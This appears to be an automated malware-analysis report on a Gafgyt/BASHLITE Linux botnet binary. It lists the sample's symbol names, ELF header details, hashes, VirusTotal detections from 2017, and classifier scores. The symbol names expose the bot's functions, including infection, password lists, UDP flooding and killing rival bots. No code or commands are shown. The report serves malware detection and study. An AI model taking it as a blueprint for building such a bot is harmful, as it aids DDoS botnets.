__exit_cleanup, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , getBuild, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , PromServer, , __raise, , setsockopt, , bsd_signal, , fseek, , mremap, , __GI_kill, , __GI_strcmp, , __GI_memmove, , sendSTD, , setstate, , __decode_dotted, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , tmpdirs, , __stdin, , stdin, , __GI_isatty, , strcasestr, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , __decode_header, , getCores, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , wcsrtombs, , _stdio_user_locking, , strncpy, , strcasecmp, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , realloc, , __GI_gethostbyname_r, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI___C_ctype_tolower, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , ClearHistory, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , fork, , __stdio_rfill, , strncat, , gotIP, , __GI_sleep, , sigaction, , __GI_gethostbyname, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __GI_mremap, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , fopen, , __bss_start, , __libc_open, , getOurIP, , get_telstate_host, , memset, , __GI_socket, , main, , __glibc_strerror_r, , ourPublicIP, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , fdpopen, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , botkiller, , strcmp, , advances2, , __nameserver, , data_start, , __GI_sysconf, , infect, , __h_errno_location, , matchPrompt, , getcwd, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , advance_state, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , knownBots, , contains_success, , sprintf, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , _stdio_term, , __decode_answer, , __GI_signal, , stderr, , fails, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , advances, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , contains_string, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , contains_response, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , __GI_getcwd, , _dl_aux_init, , _errno, , atoi, , successes, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , fputs, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , mainCommSock, , pids, , strpbrk, , getBogos, , _load_inttype, , raise, , free, , sigprocmask, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
82468
AVclass
gafgyt
1
VirusTotal
md5
81c96bb4a0f02af89c32d5e9d6a62701
sha1
2f7c9541ab0575c7c9eacd41caaaf027e3436eaa
SCANS (DETECTION RATE = 42.37%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True check_circle

CMC
update: 20170805
version: 1.1.0.977
detected: False cancel

MAX
update: 20170807
version: 2017.6.26.1
detected: False cancel

Bkav
update: 20170807
version: 1.3.0.9282
detected: False cancel

K7GW
update: 20170807
version: 10.20.24212
detected: False cancel

ALYac
update: 20170807
version: 1.1.1.2
detected: False cancel

Avast
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True check_circle

Avira
result: LINUX/Gafgyt.mpond
update: 20170807
version: 8.3.3.4
detected: True check_circle

Baidu
update: 20170807
version: 1.0.0.2
detected: False cancel

Cyren
result: ELF/Trojan.OSXW-0
update: 20170807
version: 5.4.30.7
detected: True check_circle

DrWeb
result: Linux.BackDoor.Fgt.44
update: 20170807
version: 7.0.28.2020
detected: True check_circle

GData
result: Linux.Trojan.Agent.VH9ISO
update: 20170807
version: A:25.13734B:25.10170
detected: True check_circle

Panda
update: 20170807
version: 4.6.4.2
detected: False cancel

VBA32
update: 20170803
version: 3.12.26.4
detected: False cancel

VIPRE
update: 20170807
version: 60118
detected: False cancel

Zoner
update: 20170807
version: 1.0
detected: False cancel

AVware
update: 20170807
version: 1.5.0.42
detected: False cancel

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20170807
version: 0.99.2.0
detected: True check_circle

Comodo
update: 20170807
version: 27567
detected: False cancel

F-Prot
update: 20170807
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170807
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic BackDoor
update: 20170807
version: 6.0.6.653
detected: True check_circle

Rising
update: 20170807
version: 25.0.0.1
detected: False cancel

Sophos
result: Linux/DDoS-BI
update: 20170807
version: 4.98.0
detected: True check_circle

Yandex
update: 20170801
version: 5.5.1.3
detected: False cancel

Zillya
update: 20170806
version: 2.0.0.3355
detected: False cancel

Arcabit
update: 20170807
version: 1.0.0.817
detected: False cancel

Tencent
result: Linux.Backdoor.Gafgyt.Eanh
update: 20170807
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20170807
version: 2014.3.20.0
detected: False cancel

Webroot
update: 20170807
version: 1.0.0.207
detected: False cancel

Ad-Aware
update: 20170807
version: 3.0.3.1010
detected: False cancel

AegisLab
result: Backdoor.Linux.Gafgyt!c
update: 20170807
version: 4.2
detected: True check_circle

Emsisoft
update: 20170807
version: 4.0.1.883
detected: False cancel

F-Secure
update: 20170807
version: 11.0.19100.45
detected: False cancel

Fortinet
result: Linux/Gafgyt.B!tr
update: 20170807
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.rca
update: 20170807
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20170807
version: 2013.8.14.323
detected: False cancel

Symantec
result: Linux.Lightaidra
update: 20170807
version: 1.4.0.0
detected: True check_circle

nProtect
update: 20170807
version: 2017-08-07.02
detected: False cancel

AhnLab-V3
result: Linux/Jackdos.Gen
update: 20170807
version: 3.9.2.18278
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.y
update: 20170807
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.y
update: 20170807
version: 15.0.1.13
detected: True check_circle

Microsoft
update: 20170807
version: 1.1.14003.0
detected: False cancel

Qihoo-360
result: Win32/Trojan.DDoS.1be
update: 20170807
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20170806
version: 6.8.0.5.1813
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.y
update: 20170807
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20170807
version: 15873
detected: True check_circle

TrendMicro
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20170731
detected: False cancel

BitDefender
update: 20170807
version: 7.2
detected: False cancel

K7AntiVirus
update: 20170807
version: 10.20.24214
detected: False cancel

Malwarebytes
update: 20170807
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20170807
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20170807
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Unix.Gafgyt.eikqfj
update: 20170807
version: 1.0.94.18103
detected: True check_circle

MicroWorld-eScan
update: 20170807
version: 12.0.250.0
detected: False cancel

SUPERAntiSpyware
update: 20170807
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20170807
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.950.0.1006
detected: True check_circle

total
59
sha256
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2
scan_id
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2-1502108155
resource
81c96bb4a0f02af89c32d5e9d6a62701
positives
25
scan_date
2017-08-07 12:15:55
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle